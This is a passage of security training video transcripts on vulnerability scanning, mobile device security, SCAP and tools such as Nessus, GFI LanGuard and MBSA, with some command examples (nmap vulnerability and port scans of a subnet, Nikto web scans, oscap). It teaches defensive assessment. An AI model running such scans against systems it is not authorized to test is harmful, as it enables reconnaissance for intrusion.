We should have periodic network penetration testing because we can learn a lot from this about weaknesses we
might not realize were there and that were exploitable. Ideally, this can be done by a third party. However, we
could also have internal penetration tests conducted by our own IT teams. Periodic network vulnerability
assessments should also be conducted – again either internally or third party.
The difference between it and a pen test is that the pen test actually exploits weaknesses it finds. The
vulnerability assessment does not. It just reports on it. And the biggest single most important factor here is user
awareness and training about things like social engineering or trickery. All of the hardening that we've discussed is pretty much useless if users irresponsibly open file attachments in suspicious messages they were not expecting or click links on all kinds of web sites they should not be visiting.
Objectives
[Topic title: Mobile Device Vulnerabilities. The presenter is Dan Lachance.] In this video, I'll talk about
mobile device vulnerabilities. These days, mobile devices are ubiquitous, everybody's got one. Whether it's for
personal use, business use, or a little bit of both. The thing is that we need to treat mobile devices, like
smartphones, as full-fledged computers. They're exposed to numerous networks all the time and as a result,
there's a high possibility of infection or some kind of compromise. For example, if a user is using their
smartphone on a public WiFi network, and they do that quite often, the possibility exists that their device could
be compromised or infected on that network. So when they connect to a corporate network with that device,
problems could ensue. The other issue with mobile devices is that they're small and compact, and so therefore,
they're easily lost or stolen. So if they contain sensitive data, or if they contain apps that allow access to
sensitive data, there is a possibility of data leakage. We have to think about the storage on mobile devices. The
storage of items such as SMS text messages, cached e-mail messages, the internal storage or SD cards that
might contain sensitive data. Stored credentials, or even, for instance, PKI certificates that might be required
for a smartphone to authenticate to a VPN appliance. Then there's the issue of the apps running on the mobile
device. Even trusted app stores, in some cases, have proven to even host malware in the apps that are certified
to exist in those app stores.
So we're talking about even the big, popular app stores like Google Play for Android devices, the Microsoft
app store, the Apple iTunes app store. We need to be very careful, in terms of which apps are allowed to be
installed on mobile devices. Corporations will often use app sideloading if they've got custom developed
mobile apps. All that this means is that we've got the source files for the app and we're installing it or pushing
it out to the smartphone, for instance. Much like you'd push out an installation over the network to desktop
computers. So it's important, then, that we have policies that control the use or installation of certain types of
apps on mobile devices. Mobile devices can be logically partitioned or containerized. What this means, then, is
for BYOD, for bring your own device type of smartphones, where people bring their own personal phones and
use them for corporate use, we might have a personal partition containing personal app settings and data. And
likewise, we would also have a corporate partition on that same device containing corporate app settings and
data.
The beauty here is that we now have a way to selectively wipe corporate data, and apps and settings, from the
phone without affecting personal data in the personal partition. A mobile device management, or MDM
enterprise class solution, lets you apply policies to mobile devices to control them. So, to control things like
whether Bluetooth is enabled or not, whether the camera is enabled, SD card encryption being enforced,
preventing access to app stores. Even preventing data leakage between personal and corporate device
partitions. As an example, consider Microsoft's System Center Configuration Manager, or SCCM, which does
have some mobile device management options. [The System Center Configuration Manager window is
displayed. This window is divided into four sections.] Here in the left hand workspace area at the bottom left,
I've clicked on Assets and Compliance. And in the left hand navigator, I've gone under Compliance Settings,
where I've clicked on Configuration Items. I'm going to right-click and create a new configuration item,
specifically for mobile devices. [The Create Configuration Item Wizard opens. The first page is titled General.
He selects the Mobile device option in the Specify the type of configuration item that you want to create drop-
down list box.] And I'm going to call this Policy1. Now what I'm going to do here is set some policy settings
that control the behavior of mobile devices. So I'm going to click Next. [The next page is titled Mobile Device
Settings.] Now, what I could do is selectively choose different categories of settings, such as, let's see, Cloud
usage on the mobile device, Roaming options, Encryption options, even Password options. [These are some of
the checkboxes under the Mobile device setting groups section.] So I'm going to go ahead and do that, and then
I'll click Next. [The next page is titled Password.] Here we can see we've got password options related to the
mobile device. Also the amount of idle time, in terms of minutes, before the device is locked, so we can specify
that here. Password complexity settings. Also, as I continue through the wizard, [The next page is titled
Cloud.] I've got options as to whether or not Cloud backup is allowed, whether photos are allowed to be
synchronized.
And as I progress through here, by clicking Next, I've also got roaming options. [The next page is titled
Roaming.] And if I go Next again, here I've got the encryption options that I asked for initially when starting
this wizard. [The next page is titled Encryption.] For example, we might want to make sure that we enable
Storage card encryption by turning it On. You'll notice too, that most mobile device management solutions will
have an auto remediation option. Here we see that in the bottom left with a check mark labeled Remediate
noncompliant settings. So, for mobile devices that don't meet these settings, the required settings would be turned on automatically. As
always, let's not forget that mobile devices have firmware. And sometimes there are firmware revisions that
can address security vulnerabilities. So we need to make sure we've got the latest firmware updates on our
mobile devices. Every mobile device is a full-fledged computer, really, so it should have an up-to-date malware
scanner, ideally with centralized notification of infections. A mobile device firewall, in other words a host
based firewall, should also be configured to prevent externally initiated connections to the mobile device. In
this video, we talked about mobile device vulnerabilities.
[Topic title: Vulnerability Scanning Overview. The presenter is Dan Lachance.] In this video, I'll do an
overview of vulnerability scanning.
Vulnerability scanning begins with identification of assets that have value to the organization. That could be in
the form of sensitive data, or specific business processes, or certain ingredients used to come up with a magic
mixture in the food industry and so on. After the assets have been identified, they then need to be prioritized
along with the likelihood of threats against those assets. We also have to weigh in what the organization's
appetite for risk is. Next, we can actually conduct a vulnerability assessment. This might be conducted by
internal IT staff or IT techies from a third party firm. Or it could also be conducted by a malicious black hat
user who is performing reconnaissance scans. What should be scanned during a vulnerability scanning session?
Well it depends on what it is you want to test for weaknesses. To identify weaknesses, you might be interested
in scanning the entire network. You might scan a single device on the network, or all devices on the network.
Maybe only certain types of devices have your interest. Maybe systems that are running Windows operating
systems are the only things you want to look for weaknesses on. You might also scan applications looking for
vulnerabilities, so all applications or specific applications. So when we start configuring our vulnerability scan,
we configure the scope. And that scope might be an entire network, a specific subnet, an IP address range, and
so on. [The GFI LanGuard 2014 window is open, which includes the Dashboard and Scan tabs.] Here I've got
a trial version of GFI LanGuard 2014. And here under the Scan area, I have the option of determining my scan
target, which defaults to localhost. Now, if I go ahead and click on the ellipsis button over on the right, that's
the button with three dots, [The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link.] here I can add a
rule for computers that must meet certain conditions in order for them to be scanned. [He clicks the Add new
rule link and the Add new rule dialog box opens.]
So it could be based on computer names, I could maybe import a file that has computer names in it. Or a
specific domain name for Active Directory, an IP address range, even an organizational unit within Active
Directory. [These are some of the options under the Rule type drop-down list box.] So the idea is that we can
give it a scope of what it is we want to scan. Other considerations when configuring the scan settings are
whether or not you're going to conduct a credentialed or a non-credentialed scan. So this means that we either
give it credentials, so for example, perhaps we want to use the administrative credentials or the root credentials
and try to look for weaknesses. Or we might want to mimic an attacker that really doesn't know anything about
the environment, and we might want to conduct a non-credentialed scan. We can also run a manual or a
scheduled scan. Ideally, you should have scans scheduled to run automatically on a periodic basis, because
threats are ever changing. And so if we only conduct a vulnerability assessment scan once per quarter, once per
year, we might miss out on threats that are actually infiltrating our network. When you're configuring a
vulnerability scan, you'll always have an option where you can specify a specific set of credentials that you
want to use to conduct the scan. [He points to the Credentials drop-down list box under the Scan tabbed page
of the GFI LanGuard 2014 window.] Of course, you could also not specify any credentials, you could conduct,
in this case, a null session scan. But at the same time, if I were to go in this specific tool under the
Configuration menu, over on the left I'd see that I could also configure Scheduled Scans. [He right-clicks the
Scheduled Scans option under the Configuration section in the Configuration tabbed page and selects the New
scheduled scan option. As a result, the New scheduled scan wizard opens.] So that we're keeping up to date
with any weaknesses that might have not been apparent before, but things change. So running these scans
periodically is always a very important consideration. Scans can be run on the server, where the server reaches
out on its own and discovers devices on the network and how they're configured, and applications, and so on.
And depending on whether you run a credentialed versus non-credentialed scan will determine how in-depth
the returned information really is. There is also agent-based scanning, where we must install a software agent
on given devices on the network that can provide more scanned information.
Or we might install agents on machines on the edge of a network that our existing server-based
scanning can't reach. Most vulnerability scanners will have some kind of auto-remediation capabilities, even if
it's simply turning off options that are deemed insecure or applying updates that are missing. The results of a
scan will identify weaknesses but will not exploit them like a penetration test would. So there's not as much
risk for disruption of production systems when you conduct a vulnerability scan as there would be when you
would conduct a penetration test. So the results also allow us to improve or replace existing security controls.
So as we've seen, a vulnerability scan then is non-invasive. Discovered vulnerabilities are not exploited like
they are with pen tests. We should enable scheduled continuous monitoring of critical IT systems, in terms of
for their availability, for malware infections, even things like denial of service attacks. And that starts to fall
into that gray area of getting into intrusion detection and prevention systems.
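As a rough sketch of what scheduled, non-credentialed scanning could look like outside of a GUI tool (this is not how GFI LanGuard does it; the subnet, log path, and schedule are just example values, and nmap with its NSE scripts is assumed to be installed):
# /etc/crontab entry: every Monday at 2 a.m., run nmap's vulnerability scripts against the subnet
# and keep a dated report for comparison with earlier results
0 2 * * 1   root   nmap -sV --script vuln -oN /var/log/vulnscan-$(date +\%F).txt 192.168.1.0/24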
The items that would be checked in a standard vulnerability scan would include things like open ports, which
tells us what services are viewable or reachable on the host. Any malware that might have been detected,
missing service packs, and default operating system and app configurations that could present security
vulnerabilities, as well as insecure configurations. Also, we might check compliance against preconfigured
security baselines. So for example, here we've got a scan that's been conducted on a host running Windows
Server 2012 R2 64-bit. [He points to the Saved Scan Result node under the Scan Results Overview section of
the Scan tabbed page.] And we can see there are a few high security vulnerabilities. And if we click them, [He
clicks the High Security Vulnerabilities subnode and its content is displayed in the adjacent section named
Scan Result Details.] and then over on the right, expand the categories for Miscellaneous, we see that
AutoRun is enabled, that's a security risk. Under Software we've also got some information here talking about
a router or a firewall configuration, allowing source routing packets. And then we can take a look at other
vulnerabilities that are listed here. Here they're classified as low security vulnerabilities or high. And then
there's potential vulnerabilities, missing service packs. So all of these things are normally configurable when
we scan for weaknesses, either on a network, on a device, for an app, and so on. Whichever tool you happen to
use for vulnerability scanning, it's always important to make sure it's got an up to date vulnerability scanning
database, so it knows what to look for. Common vulnerability scanning tools include OpenVAS, Nessus,
Microsoft Baseline Security Analyzer, Nexpose and Qualys FreeScan.
[Topic title: Vulnerability Scanning Settings. The presenter is Dan Lachance.]
In this video, I'll demonstrate some common vulnerability scanning settings. Now there are plenty of
vulnerability scanning tools,
[Video description begins] The Configuration tabbed page of the GFI LanGuard 2014 window is open. [Video
description ends]
but there are many settings that they all have in common. For example, over here on the left I have a series of
scanning profiles that can be used when I conduct different types of scans. So, for instance, if I were to choose
complete and combination scans,
[Video description begins] He selects the Complete/Combination Scans subnode in the Configurations section
and its content is displayed in the content section. [Video description ends]
I've got full vulnerability assessment as a profile, which I can edit, by the way. And when I click Edit this
profile, I can determine exactly what is being done when that type of scanning profile is used to conduct a
scan.
[Video description begins] The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens. [Video
description ends]
So depending on your tool, you'll have hundreds upon hundreds of items that get checked, and of course, you
can customize by removing check marks or by adding items. However, I'm going to leave that alone. Also, if I
were to click, for example, Network & Software Audit on the left, these are other types of scanning
profiles. I can see I've got profiles here for
[Video description begins] He selects the Network & Software Audit subnode in the Configurations
section. [Video description ends]
scanning for Trojan Ports, a generic Port Scanner, Software Audit, TCP & UDP Scans, and so on. Now of
course we've got scheduled scanning options if you want this to happen on an automated basis. But in this tool,
GFI LanGuard 2014, if I go to the Scan tab, then I can determine exactly what it is I want to scan. The scan
target is currently set to the localhost.
[Video description begins] He points to the Scan Target drop-down list box under the Launch a New Scan
section in the Scan tabbed page. [Video description ends]
However if I click the ellipsis button, the button with the three dots over to the right, here I can click the Add
new rule link.
[Video description begins] The Custom target properties dialog box opens. It includes the Add any computer
that satisfies one of the following rules section, which further includes the Add new rule link. The Add new rule
dialog box opens. [Video description ends]
[Video description begins] He selects the IP address range is option in the Rule type drop-down list
box. [Video description ends]
[Video description begins] He points to the From and To text boxes under the Scan an IP address range radio
button. [Video description ends]
For the rule type, I'll choose an IP address range here. However, I could specify whatever it is that I wish depending on what it is that I want to scan. So, I'm just
going to change the addresses a little bit,
[Video description begins] He enters 192.168.1.1 in the From text box and 192.168.1.254 in the To text
box. [Video description ends]
and I'm going to click OK. And I'll click OK again, and now we can see it's filled in a custom range of IP
addresses based on the custom group settings. You see the name that's listed here. Now I can
[Video description begins] He points to the Scan Target drop-down list box. [Video description ends]
determine whether I want to use any of those profiles that we looked at for conducting my vulnerability scan.
Do I want to do a full scan, or just a TCP and UDP scan? Maybe all I want to do is look at last month's
patches. So I've got profiles for that or only missing patches and so on. So I'm going to leave it on full scan.
[Video description begins] These are some of the options in the Profile drop-down list box under the Launch a
New Scan section. [Video description ends]
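As an aside, the same two ideas, a scan target range and a scan profile, can be sketched from the command line with nmap (assumed to be installed; this is not the GFI LanGuard tool shown here, and the addresses simply match the range entered above):
# quick profile: only the most common ports across the whole range
nmap --top-ports 100 192.168.1.1-254
# fuller profile: every TCP port plus service version detection, which takes much longer
nmap -p- -sV 192.168.1.1-254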
I can tell it here which credentials I wish to use, so I've filled in some alternative credentials that should
work on most devices on my network.
[Video description begins] He points to the Credentials drop-down list box under the Launch a New Scan
section. [Video description ends]
So I've used the administrator username and the appropriate password. I can also click Scan Options here to
determine whether I want to wake up
[Video description begins] He clicks the Scan Options link in the Launch a New Scan section and the Scan
Options dialog box opens. [Video description ends]
computers that are offline or shut them down when the scan is complete. So at this point, I'm ready to start my
scan.
[Video description begins] He points to the Wake up offline computers and Shut down computers after scan
checkboxes under the Power saving options section. [Video description ends]
I'm going to go ahead and click the Scan button over on the right. So we can now see that the scan has begun,
and we're starting to see in the left-hand window the first host that it found on the network with an address of
192.168.1.1. Now,
[Video description begins] He points to the result in the Scan Results Overview section. [Video description
ends]
it says that the estimated scan time remaining is approximately six hours. The speed of your network, the type of
scanning profile, and how many hosts you're scanning will really determine exactly how long it takes. In this
video, we learned how to configure vulnerability scanning settings.
Objectives
explain how the SCAP standard is used to measure vulnerability issues and compliance
[Topic title: SCAP. The presenter is Dan Lachance.] In this video, I'll talk about SCAP. SCAP is a NIST set of
specifications related to enterprise security that has a focus on Automation and Standardization.
It stands for Security Content Automation Protocol. And it can do things like verify that patches have been
installed correctly. It can check security configurations. It can scan for signs of security breaches. It can also be
used for forensic data gathering. SCAP addresses the difficulties that larger enterprises encounter in terms of
the large number of systems that need to be secured. Especially when there is a wide variety of different
types of systems in use. Or different versions of operating systems, different versions of applications, even
using different security monitoring, management, and scanning tools. SCAP enumeration uses a standardized set
of identifiers. It looks for software flaws, insecure configurations, and also known
vulnerable products that might be installed on a host. NIST offers SCAP accreditation for products through the
SCAP validation program.
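To make the automation idea concrete, here's a minimal sketch using the oscap command-line tool from the OpenSCAP project, which is one way of running SCAP content; the profile ID and datastream path are placeholders rather than anything from this video:
# evaluate this host against an XCCDF profile in a SCAP datastream, writing machine-readable results and an HTML report
oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_standard \
    --results scan-results.xml --report scan-report.html \
    /usr/share/xml/scap/ssg/content/ssg-debian8-ds.xml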
The big part of SCAP is really dealing with automation, automated monitoring of systems. Even in a real time
situation, looking for suspicious activity, and also to look for things like misconfigurations and missing
patches. Also notifications are part of SCAP. And in some cases solutions can autoremediate noncompliant
configurations. SCAP can also be used as a vulnerability assessment tool, since it can identify problems with
configurations related to an operating system or a specific application even. SCAP reports can identify security
vulnerabilities and insecure configurations. Some examples of NIST-validated SCAP tools include IBM
BigFix Compliance, Nexpose, the SCAP extensions for Microsoft System Center Configuration Manager or
SCCM, Qualys SCAP Auditor, the SAINT Security Suite, and finally, OpenSCAP. In this video, we talked
about SCAP.
Objectives
[Topic title: Scan for Vulnerabilities using Nessus. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to conduct a vulnerability scan using Nessus.
[The Download Nessus page of the tenable.com web site is open.] Nessus is a widely used vulnerability
scanning tool that runs on different platforms. But if you're using Kali Linux which already contains many
security tools, you'll notice that Nessus isn't included. But that's no problem, we can easily go to the
tenable.com web site where we can download the Nessus tool. So as I scroll down on that page, I can select
Windows, Mac OS X, Linux or FreeBSD. So because I'm going to be running Nessus on Kali Linux, I'm going
to expand Linux, where I can download the 64 or 32-bit Debian package. Now at the same time, I can scroll
down even further and I can choose the Get an activation code button. [The presenter clicks this button and the
Obtain an Activation Code page opens.] Now, from here, I have the option of determining if I want to use
Nessus Home for free, which limits me to scanning 16 hosts. Or I could go with Nessus Professional by paying
a yearly fee. So if I wanted to go with the free evaluation version for home, I would simply click Register Now.
Specify some email address information, it's completely free, and it would then email me my activation code.
Now once you've downloaded the installer, the Debian package, you can install it here at the command line
using the dpkg command-line tool with the -i option. [He highlights
the dpkg -i Nessus-6.8.1-debian6_amd64.deb command in the root@kali command prompt window.] Now once
you've installed this, it tells you to start the Nessus daemon. And then it tells us to point our web browser to
https, whatever the host name is, port 8834. Let's switch back to the Kali Linux Iceweasel browser, and let's
actually connect to the Nessus config page. [He opens the Nessus Home / Scans web page. At the top of this
page are two tabs, Scans and Policies.] Now if you're prompted for credentials, specify the username and
password that you created when you initially configured Nessus. So I don't have any scans here, so
I'm going to go ahead and click the New Scan link over on the left, [He clicks the New Scan button and the
Scan Library subpage opens.] which gives me a list of templates.
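Stepping back to the installation for a moment, those setup steps can be summarized as commands (the package file name is the one from this demo; the way the daemon is started may vary slightly by distribution):
# install the downloaded Debian package, start the Nessus daemon, then browse to the web UI
dpkg -i Nessus-6.8.1-debian6_amd64.deb
service nessusd start        # on systemd-based systems: systemctl start nessusd
# then point a browser at https://localhost:8834 and complete the initial setup
With the daemon running and the browser pointed at port 8834, we can carry on with the scan templates.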
Notice some of these templates, the ones that have the purple bar, require an upgrade. But there's still some
very powerful things I can evaluate here with the Nessus Home Edition. I'll start by clicking the Basic Network
Scan template. [The New Scan / Basic Network subpage opens. It is divided into two sections. The left section
is the navigation pane, which contains the BASIC, DISCOVERY, ASSESSMENT, REPORT, and ADVANCED
subsections. The BASIC subsection includes the General and Schedule options. The right section displays the
content of the option selected in the left section. The General option is selected by default and its content is
displayed, which includes the Name, Description, and Targets text boxes.] I'm going to call this new scan
Basic Network Scan- Chicago Subnet 1. [He types this in the Name text box.] So down below, I have to
specify the targets, whether it's a single host or a network range. I'm going to specify the network range of
192.168.1.1-192.168.1.254. Now over on the left, I can also click on other options I want to include in this
scan such as Scheduling. [He selects the Schedule option in the left section. Its content includes the Enable
Schedule toggle button.] Currently the schedule is not turned on, but I could turn on the schedule to determine
when I want this vulnerability assessment to be conducted. However, I will leave it on manual invocation,
which was the default setting. Under DISCOVERY on the left, I'm going to click on that link to determine
exactly how hosts are discovered. [He clicks the DISCOVERY subsection and its content is displayed.] Here
it's going to conduct a common port scan but I could choose from the list from other profiles such as Port scan
(all ports), or even I could choose Custom. [He points to the Scan Type drop-down list box.] I'm going to leave
it on Port scan (common ports). For ASSESSMENT, over on the left, [He selects the ASSESSMENT
subsection.] I can also determine what types of items I want to specify, in terms of what I want to scan for. So
here I'm going to choose Scan for all web vulnerabilities (quick) [He selects this option in the Scan Type drop-
down list box.] and down below, I can see exactly what it's going to do.
So let's go and Enable CGI scanning, it's going to start crawling from the root of the web site and so on. I've
got a few report options here I might be interested in, [He selects the REPORT subsection.] such as allowing
the results of the scan to be editable [He points to the Allow users to edit scan results checkbox.] or displaying
hosts that respond to ping, [He points to the Display hosts that respond to ping checkbox.] or displaying even
unreachable hosts within the range that I specified. [He points to the Display unreachable hosts
checkbox.] And on ADVANCED, if I click on that on the left, [He selects the ADVANCED subsection.] I've
got a few options here related to performance as I'm running the scan. So when I'm happy with my settings, I'll
go ahead and Save what I've configured, [He clicks the Save button at the bottom of the subpage. Now the My
Scans list in the Nessus Home / Scans web page includes the Basic Network Scan - Chicago Subnet 1 list
item.] because the next thing we'll do, because we didn't configure scheduling, is we'll have to invoke it
manually. We can do that from this list by clicking the Launch button, it looks like the play button. So I'm
going to go ahead and click on that [He clicks the Launch button adjacent to the list item.] and I can now see
the timestamp from when it started conducting this scan. At any point in time, while the scan is running, I can
click on this little Running icon. [He clicks the Running icon adjacent to the list item and the Basic Network
Scan - Chicago Subnet 1 subpage opens.] And it will take me into another page that shows me what it's
discovered so far, in terms of the number of hosts, and any vulnerabilities it might have found on them so far.
So here we only see it's started scanning the first IP address in the range and it found one host, but we really
don't have much more. But as we wait a little bit longer we'll see this screen updating as it discovers more
hosts and vulnerabilities. Ideally no vulnerabilities, but that's why we're running this tool. So let's wait a few
minutes, and then we'll come back and see what it's found. So now that the scan's been running for a few
minutes, we can see it's discovered numerous hosts on the network. Now, most of these look good because
blue, according to the legend, is just informational messages about the device. However, any colors, like when
we start getting into the orange colors, or red if it finds critical vulnerabilities, that needs to draw our attention.
So here we've got a host that apparently has one, [He points to the host IP address 192.168.1.1.] there's a little
number one here, one medium vulnerability. Now to get details about what that is, I could click on the IP
address for that host over on the left. That's going to jump me into a page specifically about that device and
what's been learned so far, [This page displays information about the IP address such as the severity, plugin
name, and count.] bear in mind, the scan is still not complete. So here we've got a medium vulnerability that
was found related to the DNS Server Cache.
At the same time, I can also see over here, the IP address, the DNS name and when this scan was started for
this particular host. I can even download a report of found vulnerabilities here to a file, [This information is
available under the Host Details section.] so I can then deal with a remediation of those discovered issues.
Now, I'm going to go back to the scans screen, so I'll click on the Scans link at the top of the screen. [The
Nessus Home / Scans page opens.] At any point in time, I can go ahead and pause or stop that scan, [He points
to the Pause and Stop buttons adjacent to the list item under the My Scans list.] and after it's stopped, I'll get
an X here. I can even delete it in the future. However, I'm just going to click stop. Now it asks me if I'm sure I
want to stop the scan, now realistically, you want it to continue. However, in the interest of time here, we're
going to stop it. Another interesting thing we can do here in Nessus is go up to the Policies link, where we can
build a new policy. [He clicks the New Policy button in the Policies tabbed page and the Policy Library
subpage opens. It includes several template options.] Which essentially lets us build a custom set of
settings that we can base scans on. So here in my scanner templates, in this example, I'll choose Host
Discovery. [The New Policy / Host Discovery subpage opens. It is divided into two sections. The left section is
the navigation pane, which contains the BASIC, DISCOVERY, and REPORT subsections. The BASIC
subsection includes the General and Permissions options. The General option is selected by default and its
content is displayed in the section on the right. It contains two text boxes, Name and Description.] Then I'm
going to call this CustomHostDiscovery1. And on the left I'll click DISCOVERY, to see exactly how it's
discovering hosts on the network. [The content of the DISCOVERY subsection includes the Scan Type drop-
down list box.] Sometimes you might want to first just identify what exists on the network before you
actually conduct a detailed scan of those devices. So here I'm going to choose OS Identification [He selects
this option in the Scan Type drop-down list box.] for OS fingerprinting, and I'm going to click Save. So now
I've got a saved policy called CustomHostDiscovery1, [The Policies tabbed page now includes the
CustomHostDiscovery1 item under the All Policies list.] but how do I use this? Well, what I need to do is click
on the Scans link up at the top. And when I click New Scan on the left, if I scroll all the way down to the
bottom, I'm going to see my custom policies, such as my CustomHostDiscovery1 policy. [This policy appears
under the User Created Policies section in the Scan Library subpage.] So from there, if I load that up by
clicking on it, I can build a new scan, schedule it, and then start conducting my vulnerability assessment based
on these customized settings.
Objectives
[Topic title: Common Vulnerability Scanning Tools. The presenter is Dan Lachance.] In this video I'll talk
about common vulnerability scanning tools.
The goal of vulnerability scanning is to identify and address weaknesses. Although unlike penetration testing,
we aren't testing the behavior when we try to exploit those weaknesses. So therefore, vulnerability scanning is
quite passive and shouldn't disrupt production systems. The database used by the vulnerability scanning tool
needs to contain known security misconfigurations, common attack vectors, known suspicious activity, and also
known suspicious activity remnants. Now, this database, of course,
needs to be updated as these things change over time. With a noncredentialed scan, we get similar results that
would be achieved when a malicious user does scanning during reconnaissance. Whereas a credentialed scan
has access to systems. And it really kind of mimics a compromised account within the company and what
could be learned using that compromised account. Vulnerability scanning tools often have other abilities, such
as the ability to correlate scan results with past activity to see what's changed. It could also have the ability to
identify false positives that might even be configurable in some tools. We can also compare scan results with
best practices, and in some cases, auto-remediate devices that don't adhere to best practices. We can also
compare current scan results with previous scan results overall. This way, we can plan our response priorities
when it comes to incident response.
There should always be ongoing scans, since the threat landscape is changing all of the time. Some
vulnerability scanning tools are command line based. Others have a GUI, like GFI LanGuard, which I'm using
here. [The configuration tabbed page of the GFI LanGuard 2014 window is open.] Regardless of the solution
of your choice, they have a lot of commonalities in terms of their functionality. For instance, here under
Agents Management on the left, [The presenter points to the Agents Management option under the
Configurations section, which is selected by default. Its content is displayed in the content section.] I can
deploy agents to other computers for further scanning. I also have the option on the left of configuring a
Scanning Profile. For instance, I'll click the Vulnerability Assessment scanning profile on the left. [He clicks
the Vulnerability Assessment subnode of the Scanning Profiles node under the Configurations section.] Then
over on the right, maybe for High Security Vulnerabilities, [Its content includes the High Security
Vulnerabilities list item. There is the Edit this profile link adjacent to this item.] I'll click the Edit this profile
link. [The GFI LanGuard 2014 Scanning Profiles Editor dialog box opens.] So essentially, I can customize
what I am scanning for within my Vulnerability Assessment. [The dialog box includes the Profile categories
section, which further includes the Vulnerability Assessment option.] So here we've got hundreds upon
hundreds of High Security Vulnerabilities that get checked. [The content of the Vulnerability Assessment
option is displayed in the content section of the dialog box.] And I have the option, of course, of deselecting
some if I don't want to check them. The more things you're checking for, the longer it takes. But then at the
same time, the more thorough the scan results that you get in the end. Over on the left, I also have the option of
Scheduling Scans. [He right-clicks the Scheduled Scans node under the Configurations section and selects the
New scheduled scan option from the shortcut menu. As a result, the New scheduled scan wizard
opens.] Scheduling scans is important so that we scan either a single computer or a bunch of computers on the
network or the whole network. So that we are keeping up to date with any newer threats or newer suspicious
activity.
We also have the option in many of these vulnerability scanning tools to store an application inventory. [He
clicks the Applications Inventory node under the Configuration section and its content is displayed in the
content section.] It will scan for software installed on devices so it can give you recommendations on whether
or not something should be removed or configured differently. There's also software updating, which I've
clicked on in the left hand-navigator here, [He clicks the Software Updates node under the Configuration
section and its content is displayed in the content section.] where we can configure software updates that
would be automatically downloaded or autodeployed to machines that are missing them. All vulnerability
scanners have some kind of an option for alerting. [He clicks the Alerting Options node under the
Configuration section.] For example, sending an email message to administrators by connecting to a mail
server. Vulnerability scanners always have a database that they use when they conduct vulnerability
assessments, and that database must be kept up to date. [He clicks the Database Maintenance Options node
under the Configuration section.] But, for example, if I were to go into Program Updates on the left in this
tool, [He clicks the Program Updates node under the Configuration section and its content is displayed in the
content section.] then I can see I've got options for the Vulnerabilities Database Update, and I can see when it
was last kept up to date. You'll find common vulnerability scanning tools from Qualys. Nessus is a commonly
used vulnerability scanning tool that we'll take a look at in another Linux demonstration. There's
OpenVAS, Nexpose, Nikto, Microsoft Baseline Security Analyzer, and the list goes on and on and on.
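As a quick, hedged example with one of the tools just listed, Nikto (assumed to be installed, as it is on Kali Linux) can check a single web server for known issues; the target address and port are just examples:
# scan a web server for known vulnerable files, outdated software versions, and common misconfigurations
nikto -h http://192.168.1.10
# the -p option targets a non-default port
nikto -h 192.168.1.10 -p 8080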
Objectives
[Topic title: Scan for Vulnerabilities using Microsoft Baseline Security Analyzer. The presenter is Dan
Lachance.] There are quite a lot of tools out there that will let you conduct a vulnerability scan of a Unix,
Linux or Windows host. In this video I'll demonstrate how to use the free Microsoft Baseline Security
Analyzer, or MBSA, to conduct a scan.
So I've already downloaded and installed the Microsoft Baseline Security Analyzer. You can see I've got a
shortcut icon here on my desktop. So I'm going to go ahead and double-click to launch the tool. [The Microsoft
Baseline Security Analyzer 2.3 window opens. It includes a section, which is titled Check computers for
common security misconfigurations. This section includes the Scan a computer and Scan multiple computers
options.] Now here, MBSA can be used to scan a single computer for vulnerabilities or multiple computers.
Here, I'll choose Scan a computer. [A page opens that is titled Which computer do you want to scan? It
includes the Computer name and IP address drop-down list boxes. It also includes the Security report name
text box.] It automatically picks up the local computer name, but I could also have specified the IP address.
The report that it generates will use these variables where %D is for the name of the domain, %C is for the
computer name and so on. I'm going to accept the defaults for that. The options that have selection marks by
default include to check for Windows admin vulnerabilities, weak passwords, IIS administrative
vulnerabilities, SQL server administrative vulnerabilities. And just to check that security updates have been
installed successfully on the host. [These are the checkboxes present under the Options section of the
page.] So at this point, I'm going to go ahead and click the Start Scan button in the bottom right. And we can
now see that it's getting the latest security update information from Microsoft online and it's begun to scan. [A
page opens that is titled Report Details for QUICK24X7 - CM001.] So now that it's had a chance to scan, we
can see the results of our security vulnerability scan on this host, specifically called CM001.
So as we scroll down further through the results, we can see where there were problems. In this case for SQL
Server, we're missing security updates, as well as for Windows and for Silverlight as well as System
Center. [These issues are displayed under the Security Update Scan Results section.] But as we keep going
through, we'll get a sense of what was scanned and where the problems are. Such as automatic updates not
being installed in the computer even though there are outstanding updates or more than two administrative
accounts found on the machine. Password settings, Windows Firewall problems, as well as file system
scans. [These issues are displayed under the Administrative Vulnerabilities section.] Checking to see which
services are currently running but may not be necessary because they're not being used. [He points to the
Additional System Information section.] IIS web server issues that we have to address. In this case, there are
none, they all have a green shield symbol. And as you can see as we scroll down, we can see all of the items
that were tested. In this case for SQL Server, we have a number of items like SQL service accounts and
password policies. So different vulnerability scanning tools will scan a single host, as we've done here, or
numerous hosts and will report on different items. Down at the bottom, of course, here we can print the report
or copy it to the clipboard so we can work with this data in other tools. [These options are available at the
bottom of the page.]
In this video, we learned how to scan a host for vulnerabilities using the Microsoft Baseline Security Analyzer.
Objectives
[Topic title: Review Vulnerability Scan Results. The presenter is Dan Lachance.] In this video, we'll take a
look at the result of a vulnerability scan.
Now, there are plenty of tools that can conduct vulnerability scans. Here we've got GFI LanGuard 2014, [The
Scan tabbed page of the GFI LanGuard 2014 window is open.] where we've already conducted a scan of an IP
range. And we can see by looking at the Scan Results Overview that it found numerous hosts on the
network. [He points to the Scan Results Overview section in the Scan tabbed page.] Now, the host that we're
currently running this from is a different color listed down here towards the bottom left of the listing of hosts.
However, what I'm going to do is pick on, let's say, the computer here with the name of LIVINGROOM,
which apparently is running Windows 10. And I'm going to expand the Vulnerability Assessment on that host
in the left-hand navigator. Then I'll click Low Security Vulnerabilities. [In the Scan Results Overview section,
he clicks the Low Security Vulnerabilities subnode under the Vulnerability Assessment node of the
192.168.1.94 address. Its content is displayed in the Scan Results Details section.] Here it talks about HTTPS,
running, and HTTP, running. So in other words, there's a web server. Now, if that's not what you expected
because that might be a workstation, that's a problem. It's got a larger attack surface than it really needs. And
we all know that to harden a system, you should really only make sure it runs what is absolutely required and
nothing more. If I were to click Potential Vulnerabilities on that host, [He clicks the Potential Vulnerabilities
subnode under the Vulnerability Assessment node of the 192.168.1.94 address and its content is displayed in
the Scan Results Details section.] it talks a little bit about ports that might be open and might be used by a
Trojan. In this case, for example, TCP port 9090. Now, if I open up, for that same host, the Network and
